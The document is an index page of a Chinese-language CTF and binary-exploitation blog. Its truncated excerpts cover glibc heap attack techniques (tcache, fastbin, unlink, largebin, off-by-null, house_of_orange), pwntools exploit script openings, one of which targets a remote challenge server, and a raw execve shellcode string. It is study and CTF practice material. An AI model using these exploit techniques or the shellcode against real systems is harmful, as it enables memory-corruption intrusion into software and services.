Blog of cat03

byteCTF2020_PWN

发表于2021-09-15

easyheapexp1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283#!/usr/bin/env pythonfrom pwn import *binary = "./easyheap"lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"p = process(binary)elf = ELF(binary)libc = ELF(lib)# context.log_level = "debug"s = lambda buf: p.send(buf)sl = lambda buf: p.sendline(buf)sa = lambda delim, buf: p.sendafter(delim, buf)sal = lambd ...

tcache之攻击mp_及源码分析

发表于2021-09-08

tcache之攻击mp_ 如果程序强迫只能申请大块的chunk，通过largebin attack，或unsortedbin attack,能将变量修改成较大的值,却难以申请到libc，而本文描述的方法会强制大块的申请也通过tcache进行get，put，这样也就可利用tcache的攻击手法，去申请libc空间 tip:下面源代码来源于glibc2.31 1234567891011121314151617181920212223242526272829303132333435363738394041# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)# define MAYBE_INIT_TCACHE() \ if (__glibc_unlikely (tcache == NULL)) \ tcache_init();static __always_inline void *tcache_get (size_t tc_idx){ tcache_entry ...

fastbin size错位构造及源码分析

发表于2021-09-04|pwn

fastbin size错位构造这个主要是较之于tcache修改fd指针为libc区域直接就能申请到那段空间而在glibc2.23中没有tcache。但是也可通过在libc区域错位构造size，来申请那段空间 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152/* offset 2 to use otherwise unindexable first 2 bins */#define fastbin_index(sz) \ ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)static void *_int_malloc (mstate av, size_t bytes){ ... if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { idx = f ...

祥云杯pwn

发表于2021-09-02

Note 由于没有free就按着house_of_orange那一套打的 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106#!/usr/bin/env pythonfrom pwn import *re = 1context.log_level = "debug"if re: p = remote("47.104.70.90", "25315") libc = ELF("./libc-2.23.so")else: binary = "./note" p = process(binary) lib = "/lib ...

off_by_null源码分析

发表于2021-08-28|pwn

2.23一种利用方式12345678910111213141516171819202122232425262728#include <stdio.h>#include <stdlib.h>typedef unsigned char u8;typedef unsigned int u32;int main(){ u8 *b1, *b2; u8 *A, *B, *C; A = malloc(0x18); B = malloc(0x100); C = malloc(0x100); malloc(0); //barriar *(u32*)(B+0xf0) = 0x100; free(B); A[0x18] = '\x00'; // off by null b1 = malloc(0x88); b2 = malloc(0x18); free(b1); free(C); //trigger return 0;} heap layout 12345678910 ...

unlink_attack源码分析

发表于2021-08-24|pwn

unlink attack这是unlink的攻击过程 123456789101112131415161718192021222324252627#include <stdio.h>#include <stdlib.h>#include <stdint.h>#include <assert.h>uint64_t var1; int main(){ uint64_t *p0 = malloc(0x40); uint64_t *p1 = malloc(0x100); uint64_t *p2 = malloc(0x90); malloc(0x20); var1 = (unsigned long)p1; p1[0] = 0; p1[1] = p1[-1]-0x10; p1[2] = (unsigned long)(&var1-3); p1[3] = (unsigned long)(&var1-2); p2[-2] = p1[-1]-0x10-1; p2[-1] = 0xa0;//把pre_inuse置0 fre ...

largebin_attack 源码分析

发表于2021-08-20|pwn

Large bin attack源码分析12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697static void *_int_malloc (mstate av, size_t bytes){ if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) ...//在现有fastbin中取,若取出则直接返回 if (in_smallbin_range (nb)) ... //在现有smallbin中取,若取出则直接返回 else //in_largebin_range ... for(;; ) { w ...

house_of_orange源码分析

发表于2021-08-12

获取free_chunk程序中并没有free函数，但是可以利用以下方法获取free_chunk. 当malloc(size);时,malloc() -> __libc_malloc -> _int_malloc,以下简化了逻辑 1234567891011121314151617181920212223242526272829303132static void *_int_malloc (mstate av, size_t bytes){ if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) ... if (in_smallbin_range (nb)) ... else //in_largebin_range ... 通过malloc_consolidate合并且无法在已有的bins内找到 goto use_top ... use_top: victim = av->top; size = c ...

以glibc源码调试程序的方法

发表于2021-08-07

总结写在前,第一种方法最有效。第二种适合调试其他版本。第三种很磨练意志。方法1 安装带调试的libc sudo apt install libc6-dbg sudo apt install libc6-dbg:i386 下载源码首先修改/etc/apt/sources.list，将deb-src配置开启更新sudo apt update 使用apt source下载源码apt source libc6-dev 导入 gdb file -d glibc/malloc/ -d glibc/libio/ directory glibc/libio/ 方法2查看glibc版本123456789101112131415giles@ubuntu:~/Desktop $ ldd /bin/bash linux-vdso.so.1 (0x00007fff9a575000) libtinfo.so.6 => /lib/x86_64-linux-gnu/libtinfo.so.6 (0x00007f14d656d000) libdl.so.2 => /lib/x86_ ...

学io的记录

发表于2021-08-02

hctf2018_the_end 开了pie对text段的断点 b *$rebase(addr) 对libc地址的断点 b *(&_IO_cleanup+137) one_gadget多个 one_gadget elf --level 1 栈回溯的方式追踪程序流手动修改 set {long}&_IO_2_1_stdout_->vtable = arr 运行shellcode123456789101112#include <stdio.h>int main(void){ unsigned char shellcode[]="\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x48\x89\xe7\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xf6\x56\x6a\x08\x5e\x48\x01\xe6\x56\x48\x89\xe6\x31\xd2\x6a\x3b\x58\x0f\x05" ...